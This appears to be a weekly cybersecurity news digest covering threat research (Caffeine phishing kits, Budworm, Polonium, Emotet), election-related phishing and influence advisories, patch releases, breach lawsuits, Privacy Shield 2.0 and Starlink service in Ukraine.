At a glance.
- Annual SOC Performance Report is out.
- Burnout as a security issue.
- Caffeine phishing.
- The work of the CISO after the Uber verdict.
- Research on the Budworm espionage group.
- County election workers targets of phishing.
- Google Translate spoofed for credential harvesting.
- CISA and FBI publish advisory on foreign election influence operations.
- Starlink service interruptions reported.
- Reports: Germany's cybersecurity chief faces scrutiny over alleged ties to Russia.
- Renewed activity by Polonium.
- Emotet ups its game.
- COVID-19 small business grants as phishbait.
- Impersonating Intrusion Truth.
- LDS Church discloses data compromise (possibly related to espionage).
Annual SOC Performance Report is out.
Devo’s annual SOC Performance Report was released Tuesday, surveying professionals about the state of the SOC. 77% of respondents believe that their SOC is “essential” or “very important” to their company’s cybersecurity strategy. The minority who believed their SOC fell short cited lack of visibility into the attack surface and difficulties hiring and retaining skilled employees as the root problems. Cyber risk compliance, threat detection, and incident response and remediation were the most prominent SOC services delivered currently. Threat hunting and cloud-native capabilities were the top two services SOCs planned to add within the year. For more on the state of the Security Operations Center, see CyberWire Pro.
Burnout as a security issue.
Tessian Tuesday morning blogged the results of a study of overworked CISOs, and how fatigue and burnout pose a security risk. The study found that CISOs are working significant amounts of overtime, upwards of two extra days a week. This amounts on average to 16.5 extra hours a week, an increase of eleven hours over the past year. Three quarters of CISOs report difficulty “switching off” from work. Burnout seems correlated with the size of the organization. Considering just one threat, phishing, the respondents cited distraction as the reason they failed to detect a scam. (A separate survey by Forrester found that security teams can spend up to 600 hours per month on threats caused by human error.) More on CISO performance may be found at CyberWire Pro.
Caffeine phishing.
Mandiant describes a phishing-as-a-service (PhaaS) platform called “Caffeine,” which is surprisingly accessible and available to anyone on the Internet who knows the URL for its website. It's easy to use, and, unusually, it also offers templates suitable for use against Russian and Chinese targets. Mandiant's researchers add that Caffeine’s developers are actively working to expand its capabilities. For more information, see CyberWire Pro.
The work of the CISO after the Uber verdict.
The case of Joe Sullivan, Uber’s former security chief convicted for his attempt to cover up a 2016 hack, has affected the security community, specifically, C-suite security professionals. The Record by Recorded Future reports that some CISOs are beginning to fear “CISO scapegoating.” But Security InfoWatch argues that CSOs are in this position every day, and that the Uber verdict simply highlights an enduring feature of their job. For more on the state of the CISO, see CyberWire Pro.
Research on the Budworm espionage group.
The Symantec Threat Hunter Team, part of Broadcom Software, Thursday released research on the Budworm cyberespionage group. Budworm has recently been observed targeting a Middle Eastern government, a multinational electronics manufacturer, a US state legislature, and a hospital in Southeast Asia. The group leverages Log4j vulnerabilities to compromise Apache Tomcat for installation of web shells. Budworm makes extensive use of HyperBro malware, often installed through dynamic-link library (DLL) side-loading. The group has also been seen using CyberArk Viewfinity, an endpoint privilege management tool, to side-load. The group has historically hit Asia, the Middle East, and Europe, but has now been linked to an attack on a US target. A shift to US targets could mean a directional change for the group. For more on Budworm, see CyberWire Pro.
County election workers targets of phishing.
Researchers at Trellix have observed a spike in phishing emails targeting county election workers in Pennsylvania and Arizona ahead of the states’ upcoming midterm elections. The emails are attempting to steal credentials or trick the user into downloading malware. The researchers note that an attacker could use this access to achieve several goals: election interference, collection of political intelligence, or conventional cybercriminal profit-taking through sale of stolen credentials. For more on election interference, see CyberWire Pro.
Google Translate spoofed for credential harvesting.
Researchers at Avanan describe phishing emails that are impersonating Google Translate in order to steal users’ email credentials. The emails inform users that they have pending incoming emails, and they’ll need to confirm their account within 48 hours in order to receive the emails. If the user clicks the link in the emails, they’ll be taken to a phony Google Translate page with a login field. For more information on this phishing expedition, see CyberWire Pro.
CISA and FBI publish advisory on foreign election influence operations.
Late last week the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a public service announcement on the sorts of foreign influence operations to be expected during the current US midterm election cycle. "Foreign actors can use a number of methods to knowingly spread and amplify false claims and narratives about malicious cyber activity, voting processes, and results surrounding the midterm election cycle."
Starlink service interruptions reported.
Ukrainian forces are said to have encountered disruption of Starlink services as they've advanced into formerly Russian occupied territory, the Financial Times reported Friday. No cause for the outages has been established, publicly, but there's been speculation that SpaceX had interfered with service in those areas to deny them to Russian operators, and that they'd hadn't been able to keep up with Ukraine's advances. For now, the reported outages remain under investigation.
Reports: Germany's cybersecurity chief faces scrutiny over alleged ties to Russia.
Reuters reports that Arne Schoenbohm, president of the Bundesamt für Sicherheit in der Informationstechnik (BSI), Germany's federal information security agency, is under scrutiny for contacts with Russia he may have developed through his participation in the Cyber Security Council of Germany. Interior Minister Nancy Faeser is said to be seeking his dismissal. The story is still developing.
Renewed activity by Polonium.
ESET researchers outline recent activity against Israeli targets by Polonium, an Iranian-controlled threat actor that operates from Lebanon. Controlled by Iran’s Ministry of Intelligence and Security (MOIS), Polonium is a cyberespionage operation that specializes in backdooring its targets to extract information and maintain persistence.
Emotet ups its game.
ESET researchers tweeted Wednesday that the criminal operators of Emotet have been improving their product's "systeminfo module, with changes that enable malware operators to improve the targeting of specific victims and distinguish tracking bots from real users." They've also changed the system attributes Emotet collects and reports back to its command-and-control: "The new list includes processor brand, size of physical memory in MB and an approximate % of it being in use."
COVID-19 small business grants as phishbait.
INKY has published a report on the use of small business grants as phishing lures. Scammers are impersonating the US Small Business Administration (SBA) to distribute phony grant applications hosted on Google Forms. The SBA has stopped accepting applications for COVID-19 relief, but the scammers are counting on their victims' having overlooked that. The Google Form asks the user to submit their personal and financial information, including their social security number, driver's license details, and bank account information. The usual marks of a scam are present (typographical errors, nonstandard grammar and usage) as well as Google's "Report Abuse" button and its customary warning, "Never submit passwords through Google Forms.” These last two don't normally find their way into phishing scams.
Impersonating Intrusion Truth.
Researcher Dominic Alvieri tweeted that an unknown group is impersonating Intrusion Truth in an attempt to misidentify APT41, the Chinese threat actor that carries out state-directed operations while engaging in the occasional for-profit side hustle, as an NSA operation. It's not convincing: there's much mystery about APT41. It's also known as Wicked Panda, they're not NSA, and you can read all about them in, among other places, the FBI's wanted poster. Intrusion Truth is an anonymous, so-far unattributed group that for several years has devoted itself to outing Chinese cyber operators.
LDS Church discloses data compromise (possibly related to espionage).
The Church of Jesus Christ of Latter-day Saints Thursday disclosed that it had detected, in March, "unauthorized activity in certain computer systems that affected personal data of some Church members, employees, contractors, and friends." The disclosure was delayed until this week at the request of law enforcement, who asked for the information to be held to protect the integrity of the investigation. It's not publicly known who was responsible for the intrusion, but the church's statement says "U.S federal law enforcement authorities suspect that this intrusion was part of a pattern of state-sponsored cyberattacks aimed at organizations and governments around the world that are not intended to cause harm to individuals."
Patch news.
On this month’s Patch Tuesday, many vendors announced security patches for vulnerabilities. Microsoft announced eighty-five patches, Adobe twenty-six, and according to Onapsis, SAP issued twenty-three. And the US Cybersecurity and Infrastructure Agency (CISA) added one new vulnerability to its Known Exploited Vulnerabilities Catalog. For a more comprehensive overview of Patch Tuesday, see CyberWire Pro.
CISA released three industrial control system (ICS) advisories, for Altair HyperView Player, Daikin SVMPC1 and SVMPC2, and Sensormatic Electronics C-CURE 9000.
CISA also issued an unusually large number of industrial control system (ICS) advisories on Thursday. They cover issues in Siemens LOGO!, Siemens Industrial Edge Management, Siemens Solid Edge, Siemens SIMATIC S7-1200 and S7-1500 CPU Families, Hitachi Energy Lumada Asset Performance Management Prognostic Model Executor Service, Siemens Desigo PXM Devices Webserver, Siemens Nucleus RTOS FTP Server, Siemens TCP Event Service of SCALANCE and RUGGEDCOM Devices, Siemens SICAM P850 and P855 Devices, Siemens JT Open Toolkit and Simcenter Femap, Siemens SCALANCE and RUGGEDCOM Products, Siemens APOGEE, TALON and Desigo PXC/PXM Products, Siemens LOGO! 8 BM Devices, Siemens SIMATIC HMI Panels, Siemens SCALANCE X-200 and X-200IRT Families, Siemens Desigo CC and Cerberus DMS, Mitsubishi Electric MELSEC iQ-R Series (UpdateA), Mitsubishi Electric MELSEC iQ-R Series (UpdateA), Siemens PROFINET Stack Integrated on Interniche Stack (Update D), Siemens SINEC NMS (Update A), Siemens SCALANCE (Update A), Siemens SCALANCE W1750D (Update A), Siemens Apache HTTP Server (Update A), Siemens OpenSSL Affected Industrial Products (Update D), and Siemens Industrial Products with OPC UA (Update C)
Crime and punishment.
ArtNet reports that five scammers between the ages of 18 and 24 were indicted in Paris Wednesday for a crypto phishing scam. The scammers are accused of selling and reselling $2.5 million worth of NFTs from at least five victims. Christopher Durand, deputy chief of France’s cyber-crime authority, said that two of the five scammers are charged with manufacturing the scam site, and the other three are charged with advertising and money laundering. The scam operated on the promise of animating "Bored Ape" NFTs.
Courts and torts.
Zoetop, the company behind fast fashion retail giants Shein and Romwe, has been ordered to pay the US state of New York $1.9 million for a breach that exposed the data of over 40 million customers, 800,000 of which were New York residents. As the Verge recounts, in 2018 a hacker stole credit card and personal customer information from Zoetop’s systems including names, emails, and hashed passwords. The charges allege that Zoetop failed to protect customers’ data, neglected to properly inform customers of the breach, and tried to hide details about the scope of the incident. The Office of the Attorney General (OAG) conducted an investigation into the breach and found that Zoetop contacted only a portion of the impacted customers and failed to reset passwords for any of the accounts. It wasn’t until two years later, when Zoetop discovered stolen customer login info on the dark web, that the company informed customers of the breach and reset their account credentials. The company is also accused of misrepresenting the number of victims and claiming there was no evidence that credit card information was stolen. OAG also says Zoetop used inadequate password management systems and failed to monitor for security issues or establish a comprehensive attack response plan.
The Telegraph reports that far-right media personality Alex Jones has been ordered to pay $965 million in damages to the families of the Sandy Hook shooting that happened in 2012, for claims that it was a hoax. Attorney Chris Mattei said, "The families suffered a decade-long campaign of harassment and death threats by Mr Jones’ many millions of followers." Jones' false claims included stories that claimed that the families were "crisis actors," and that the attack was part of a government plot to take away Americans' guns.
Policies, procurements, and agency equities.
Last Friday US President Joe Biden issued an executive order codifying Privacy Shield 2.0, an agreement established earlier this year regarding how the EU and the US share individuals’ private data. “Transatlantic data flows are critical to enabling the $7.1 trillion EU-US economic relationship,” the White House stated. Indeed, this transfer of data is essential, but the EU has expressed concerns that the US has too much access to European data, and the Schrems II case highlighted the fact that EU citizens had no rights to petition the US government over issues concerning data collection. As Computing explains, in July 2020 the Court of Justice of the European Union (CJEU) ruled that, under EU law, the prior EU-US Privacy Shield framework was not a valid data transfer mechanism because it gave the US excessive freedom to monitor European data.
With the intent of assuaging the EU’s concerns, Biden’s EO establishes the Data Protection Review Court, which will give EU citizens the opportunity to challenge how US security agencies use their data. It also sets several restrictions on data collection, stating that any intelligence data gathering must be “proportionate” and that only very specific types of data can be collected. However, as the Register notes, critics argue the EO is unlikely to satisfy EU law. Austrian privacy activist Max Schrems commented, "In the end, the CJEU's definition will prevail, likely killing any EU decision again. The European Commission is again turning a blind eye on US law, to allow continued spying on Europeans.” Ursula Pachl, deputy director general of the European Consumer Organization, told Wired, “However much the US authorities try to paper over the cracks of the original Privacy Shield, the reality is that the EU and US still have a different approach to data protection which cannot be canceled out by an executive order.” The EO will now be sent to Brussels, where EU officials have up to six months to review it. A new data agreement is expected around March 2023, although it’s anticipated that privacy advocates will challenge the decision in court.
In a bipartisan decision, the US Senate Homeland Security Committee has approved the Securing Open Source Software Act 2022, legislation that calls on the Cybersecurity and Infrastructure Security Agency (CISA) to create a “risk framework” regarding the use of open source code within the government and critical infrastructure agency. Prompted by the infamous Log4j vulnerability, the draft act requires CISA to hire experts who are able to identify and remediate vulnerabilities in open source code, and any open source software being used will be continuously monitored and checked by CISA. The act also directs some agencies to create in-house open source programs.
Starlink founder Elon Musk tweeted last week that "This operation [providing Starlink service to Ukraine] has cost SpaceX $80M & will exceed $100M by end of year." CNN now reports that Starlink has said it can no longer bear the cost, out-of-pocket, of delivering resilient Internet service to Ukraine. The company has asked the US Department of Defense for funding. “We are not in a position to further donate terminals to Ukraine, or fund the existing terminals for an indefinite period of time,” SpaceX’s director of government sales wrote the Department.